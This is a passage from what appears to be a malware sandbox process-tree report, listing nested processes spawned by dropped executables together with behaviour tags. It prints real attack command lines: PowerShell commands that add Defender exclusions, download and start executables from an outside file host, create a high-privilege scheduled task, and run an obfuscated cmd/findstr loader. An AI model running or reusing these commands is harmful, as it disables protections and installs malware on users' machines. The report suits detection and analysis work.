                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qk5tepmd.vty\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                9⤵
                                                                                                                                                                                                  PID:8996
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\qk5tepmd.vty\gcleaner.exe
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\qk5tepmd.vty\gcleaner.exe /mixfive
                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                      PID:8728
                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mf5djr0d.kom\autosubplayer.exe /S & exit
                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                    PID:7056
                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                            5⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                            PID:6068
                                                                                                                                                                                            • C:\Users\Admin\Documents\2H8obH5mKgzEwCVfoLMHFVTi.exe
                                                                                                                                                                                              "C:\Users\Admin\Documents\2H8obH5mKgzEwCVfoLMHFVTi.exe"
                                                                                                                                                                                              6⤵
                                                                                                                                                                                                PID:7040
                                                                                                                                                                                                • C:\Users\Admin\Documents\2H8obH5mKgzEwCVfoLMHFVTi.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\2H8obH5mKgzEwCVfoLMHFVTi.exe"
                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                  PID:5380
                                                                                                                                                                                              • C:\Users\Admin\Documents\6EDBJpGdM3yrKZBmPAdrMjvi.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\6EDBJpGdM3yrKZBmPAdrMjvi.exe"
                                                                                                                                                                                                6⤵
                                                                                                                                                                                                  PID:6100
                                                                                                                                                                                                • C:\Users\Admin\Documents\DJgcrBB_yHYgagd4Xh16TzqE.exe
                                                                                                                                                                                                  "C:\Users\Admin\Documents\DJgcrBB_yHYgagd4Xh16TzqE.exe"
                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                  • C:\Users\Admin\Documents\DJgcrBB_yHYgagd4Xh16TzqE.exe
                                                                                                                                                                                                    C:\Users\Admin\Documents\DJgcrBB_yHYgagd4Xh16TzqE.exe
                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                      PID:7976
                                                                                                                                                                                                  • C:\Users\Admin\Documents\gDz6VxbpBUFndmr1CYqXf86W.exe
                                                                                                                                                                                                    "C:\Users\Admin\Documents\gDz6VxbpBUFndmr1CYqXf86W.exe"
                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                      PID:6432
                                                                                                                                                                                                    • C:\Users\Admin\Documents\_egv0QCMNosDAWG0CIDnQCnh.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\_egv0QCMNosDAWG0CIDnQCnh.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                      PID:4140
                                                                                                                                                                                                    • C:\Users\Admin\Documents\CQadCpN2aNRI3wvHLo3Epbeb.exe
                                                                                                                                                                                                      "C:\Users\Admin\Documents\CQadCpN2aNRI3wvHLo3Epbeb.exe"
                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                        PID:4876
                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                            PID:7744
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:8160
                                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                  PID:7608
                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                    PID:6720
                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:10128
                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:9764
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                        PID:7692
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                        PID:9868
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:1168
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:10128
                                                                                                                                                                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                                "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:6756
                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:8204
                                                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                                      11⤵
                                                                                                                                                                                                                                        PID:10072
                                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                                          PID:7836
                                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                                            PID:5052
                                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                            PID:9372
                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                                              11⤵
                                                                                                                                                                                                                                                PID:9408
                                                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                                                                                                                                                                                                                                                  12⤵
                                                                                                                                                                                                                                                    PID:9704
                                                                                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                                                                                                                                                                                                                                                      13⤵
                                                                                                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                                                                                      PID:1892
                                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                              PID:9372
                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                • Adds Run key to start application
                                                                                                                                                                                                                                                • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                PID:10168
                                                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                PID:2976
                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                  PID:9364
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                                                    "{path}"
                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                      PID:9660
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\PJJwNuculB0XvOxzMc0F2V0O.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\PJJwNuculB0XvOxzMc0F2V0O.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:6516
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\tSr8_WdA2UlCr4RgHyI6qouI.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\tSr8_WdA2UlCr4RgHyI6qouI.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                              PID:6948
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\ADDlXPzEM6JEUTzDIc2X6WfP.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\ADDlXPzEM6JEUTzDIc2X6WfP.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6580
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\AIHCfq1bUiISNtx2eqmfkVkP.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\AIHCfq1bUiISNtx2eqmfkVkP.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6732
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\AIHCfq1bUiISNtx2eqmfkVkP.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\Documents\AIHCfq1bUiISNtx2eqmfkVkP.exe
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:3312
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\pWYvRdHTQhv6hhOqB7qmV1z_.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\pWYvRdHTQhv6hhOqB7qmV1z_.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                    PID:5788
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\BBKmSAZujDBVVFUuH0Oa54qC.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\BBKmSAZujDBVVFUuH0Oa54qC.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:5412
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\XBtLa1Vr_e3prpeghYaPp6hM.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\XBtLa1Vr_e3prpeghYaPp6hM.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                      PID:6564
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\XBtLa1Vr_e3prpeghYaPp6hM.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\Documents\XBtLa1Vr_e3prpeghYaPp6hM.exe
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:8104
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\mSNh7ixaTwkkaBTD8rMobkpS.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\mSNh7ixaTwkkaBTD8rMobkpS.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                        PID:6968
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 768
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:6336
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 812
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:492
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 792
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:5992
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 824
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:7548
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 956
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:4452
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 992
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:7740
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1016
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:4400
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1360
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:5352
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1436
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:7328
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1476
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:7808
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1408
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:8856
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 6968 -s 1648
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                          • Program crash
                                                                                                                                                                                                                                                          PID:1400
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\kP2bkqKwjUDIBkGGS29xxA3J.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\kP2bkqKwjUDIBkGGS29xxA3J.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:6500
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 684
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6500 -s 636
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                            PID:6088
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\nXPzaeCTTeKDcyWJSRwHEQSV.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\nXPzaeCTTeKDcyWJSRwHEQSV.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                                                                                                                          PID:5976
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\3q35h5A6_08lRDNFCYf2Mcpa.exe
                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\3q35h5A6_08lRDNFCYf2Mcpa.exe"
                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                            PID:7028
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\sNMCXzLaET27791uVJFfVr4l.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\sNMCXzLaET27791uVJFfVr4l.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:7312
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\sNMCXzLaET27791uVJFfVr4l.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\Documents\sNMCXzLaET27791uVJFfVr4l.exe
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:7064
                                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\o3KHGWYMX1ackcqvoDROTRP8.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\o3KHGWYMX1ackcqvoDROTRP8.exe"
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:7460
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\8207033.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\8207033.exe"
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                      PID:6080
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\1210648.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\1210648.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                      • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                                                      PID:1244
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\5616150.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\5616150.exe"
                                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                                        PID:7568
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\LTlLWosDWfq50poUmY__x3kH.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\LTlLWosDWfq50poUmY__x3kH.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                      PID:7452
                                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\yWi_DeakcLiBJTjiUZiPxBo1.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\yWi_DeakcLiBJTjiUZiPxBo1.exe"
                                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                                        PID:8020
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-7I2U9.tmp\yWi_DeakcLiBJTjiUZiPxBo1.tmp
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-7I2U9.tmp\yWi_DeakcLiBJTjiUZiPxBo1.tmp" /SL5="$30356,138429,56832,C:\Users\Admin\Documents\yWi_DeakcLiBJTjiUZiPxBo1.exe"
                                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                          PID:7244
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-HN51S.tmp\Setup.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-HN51S.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:7564
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                                "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                • Enumerates connected drives
                                                                                                                                                                                                                                                                                • Modifies system certificate store
                                                                                                                                                                                                                                                                                PID:7164
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629282279 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                  • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                  PID:7960
                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\tfFX4a3EsNoshIKSmJsinwCf.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\tfFX4a3EsNoshIKSmJsinwCf.exe"
                                                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                                                            PID:8176
                                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\tfFX4a3EsNoshIKSmJsinwCf.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\tfFX4a3EsNoshIKSmJsinwCf.exe" -q
                                                                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                                                                PID:7700
                                                                                                                                                                                                                                                                          • C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
                                                                                                                                                                                                                                                                            "C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:6024
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\tmp51A6_tmp.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\tmp51A6_tmp.exe"
                                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                              PID:6176
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\dllhost.exe
                                                                                                                                                                                                                                                                                "C:\Windows\System32\dllhost.exe"
                                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                                  PID:7672
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
                                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                                    PID:7880
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      cmd
                                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                                        PID:3884
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                          findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                                                                                            PID:6660
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                            Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                            PID:7908
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                              PID:8252
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
